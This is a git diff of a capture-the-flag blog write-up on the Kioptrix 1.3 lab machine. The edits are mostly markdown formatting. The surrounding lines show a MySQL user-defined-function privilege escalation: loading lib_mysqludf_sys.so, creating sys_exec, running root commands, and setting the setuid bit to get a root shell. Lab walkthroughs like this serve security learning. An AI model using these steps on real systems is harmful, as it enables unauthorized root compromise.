--- a/_posts/2019-03-20-Kioptrix-1.3.md
+++ b/_posts/2019-03-20-Kioptrix-1.3.md
@@ -170,6 +170,7 @@ going back to the restricted shell, I just learned that I can get the list of th
 `john:~$ ?
 cd  clear  echo  exit  help  ll  lpath  ls
 `
+
 `
 john:~$ echo $SHELL
 *** forbidden path -> "/bin/kshell"
@@ -313,7 +314,8 @@ I go to google for:
 
 and I get back this interesting link:
 
-`https://github.com/lamontns/pentest/blob/master/privilege-escalation/linux-privilege-escalation.md`
+`https://github.com/lamontns/pentest/blob/master/privilege-escalation/linux-privilege-escalation.md
+`
 
 In the article it mentions that it may be possible to get root privileges if one has mysql root access...
 
@@ -343,11 +345,13 @@ and yes we are in:
 
 Reading further int he document:
 
-```https://github.com/lamontns/pentest/blob/master/privilege-escalation/linux-privilege-escalation.md```
+```console
+https://github.com/lamontns/pentest/blob/master/privilege-escalation/linux-privilege-escalation.md
+```
 
 Here the document section of our interest:
 
-```
+```console
 mysql -u root
 use mysql;
 create table hack(line blob);
@@ -355,9 +359,11 @@ insert into hack values(load_file('/tmp/lib_mysqludf_sys.so'));
 select * from hack into dumpfile '/usr/lib/lib_mysqludf_sys.so';
 create function sys_exec returns some integer soname'lib_mysqludf_sys.so';
 ```
+
 In the article we find a reference to:
 
-`https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/`
+`https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
+`
 
 and fro there I do a git clone:
 
@@ -383,8 +389,10 @@ Mar 21 09:40 lib_mysqludf_sys.c
  
 and not only that... also the same sum:
 
-` sum /usr/lib/lib_mysqludf_sys.so
-35117    13`
+`
+sum /usr/lib/lib_mysqludf_sys.so
+35117    13
+`
 
 `
 tamosma@kali:~/hck-exercise/kioptrix-1.3/lib_mysqludf_sys$ sum lib_mysqludf_sys.so
@@ -401,7 +409,7 @@ as we had a look from:
 `lib_mysqludf_sys.sql`
 
 
-```
+```console
 Test function:
 select sys_exec('id >/tmp/out; chown user:user /tmp/out');
 quit
@@ -467,14 +475,16 @@ We transfer the file to the victim phrough python HTTPServer:
 
 then we give him the setuid bit of root:
 
-`mysql> select sys_exec('chmod +s /home/john/escalate2root');`
+`
+mysql> select sys_exec('chmod +s /home/john/escalate2root');
+`
 
 and the result is cool:
 
-`
+```console
 -rwsr-sr-x 1 root root  15536 2020-03-21 10:26 escalate2root
 john@Kioptrix4:~$ ./escalate2root 
 # id
 uid=1001(john) gid=1001(john) euid=0(root) egid=0(root) groups=27(sudo),1001(john)
 # 
-`
+```
